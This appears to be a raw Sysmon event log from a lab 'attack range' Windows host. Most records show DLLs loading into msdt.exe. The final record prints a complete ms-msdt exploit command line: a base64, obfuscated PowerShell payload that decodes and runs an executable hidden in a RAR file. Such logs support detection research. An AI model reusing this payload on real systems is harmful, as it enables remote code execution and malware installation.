CorporationCRYPT32.DLLMD5=341C44C830FB5D4FA58EF6276D9D2511,SHA256=988C82047689A625BA54959D2DB401A6891B9C00CF8A262842FBA2F032519283,IMPHASH=42B269CD88D7BD841B43BB1788792A62trueMicrosoft WindowsValid 734700x800000000000000099118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242,IMPHASH=B6562243FBF394F03046E917C719260FtrueMicrosoft WindowsValid 734700x800000000000000099117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\wer.dll10.0.14393.4704 (rs1_release.211004-1917)Windows Error Reporting DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationwer.dllMD5=7E027B814172825204990B59AA353DB6,SHA256=F6F12530FE0312540C3C1310D618EE4D9005199E90E1BB9B385CA086C54E20C1,IMPHASH=D4255358570CE65AE9390E07B2795ADCtrueMicrosoft WindowsValid 734700x800000000000000099116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000099115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\wintrust.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=55FCE44E89BDA2444619661FE50F43EE,SHA256=420CACA0D821E7E9F1D1E683E9899BC2F6D5A4AA06C8D4BB23335DD9490CC0F8,IMPHASH=8B8383FC3FA03C92F859A2AF899A52ADtrueMicrosoft WindowsValid 734700x800000000000000099114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=0DB1A588A248E852AD781AE14333A5C6,SHA256=6F9C36C2663B90439A1AEE74855C521FCBBDB8C7B88382C9464906F1691F65F6,IMPHASH=06716A63D3E6F97CB489B0D6810B3519trueMicrosoft WindowsValid 734700x800000000000000099113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12,IMPHASH=67E6A4C8E164C0229E3FF1626F1894C6trueMicrosoft WindowsValid 734700x800000000000000099112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560D,IMPHASH=5500EF6AAEED0FAA2DE0F3B65E67DE20trueMicrosoft WindowsValid 734700x800000000000000099111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5,IMPHASH=C3F4A4DA2950075F09DD008B60FF567CtrueMicrosoft WindowsValid 734700x800000000000000099107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899,IMPHASH=9060609FCB6C4120D4517877408A4A46trueMicrosoft WindowsValid 734700x800000000000000099106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160,IMPHASH=3C09BDCE2388320645D7656AE2AC744CtrueMicrosoft WindowsValid 734700x800000000000000099105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000099104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92,IMPHASH=9F3DE8492A7F075320A36332ACC9CAAFtrueMicrosoft WindowsValid 734700x800000000000000099103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575,IMPHASH=CBD4A2FD581B65B4B1934DA291FA2B86trueMicrosoft WindowsValid 734700x800000000000000099102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\windows.storage.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=92988D33BA5299F42B23A1A69000FE4F,SHA256=C79560448589DB04ABB617D9FCA27D4C8E229F344BDCA937322BA8C3E7DBDD53,IMPHASH=A03B8A6BEC68C432E677F3D5E1DA4FAFtrueMicrosoft WindowsValid 734700x800000000000000099098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704,IMPHASH=1835EBC72F9ADB09C6FCFABC04AC9C89trueMicrosoft WindowsValid 734700x800000000000000099097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\shell32.dll10.0.14393.5125 (rs1_release.220429-1732)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F6FECBE8E5C78CD1621E3FF94040AC88,SHA256=128677FA3B8E693EB1C71D455A574CAFB3A0BB688FA1F813F17E476098C59C77,IMPHASH=0DFD49B61B099EE341A0B3D9B49EE90DtrueMicrosoft WindowsValid 734700x800000000000000099096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.344{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.328{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.328{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.328{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.328{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000099088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msdt.exe10.0.14393.0 (rs1_release.160715-1616)Diagnostics Troubleshooting WizardMicrosoft® Windows® Operating SystemMicrosoft Corporationmsdt.exeMD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35trueMicrosoft WindowsValid 10341000x800000000000000099084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-A43E-6294-D800-000000005502}28842488C:\Windows\system32\csrss.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.313{326FD73D-AAC7-6294-6108-000000005502}54885948C:\Windows\system32\cmd.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.315{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exe10.0.14393.0 (rs1_release.160715-1616)Diagnostics Troubleshooting WizardMicrosoft® Windows® Operating SystemMicrosoft Corporationmsdt.exe"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=calc IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"C:\Program 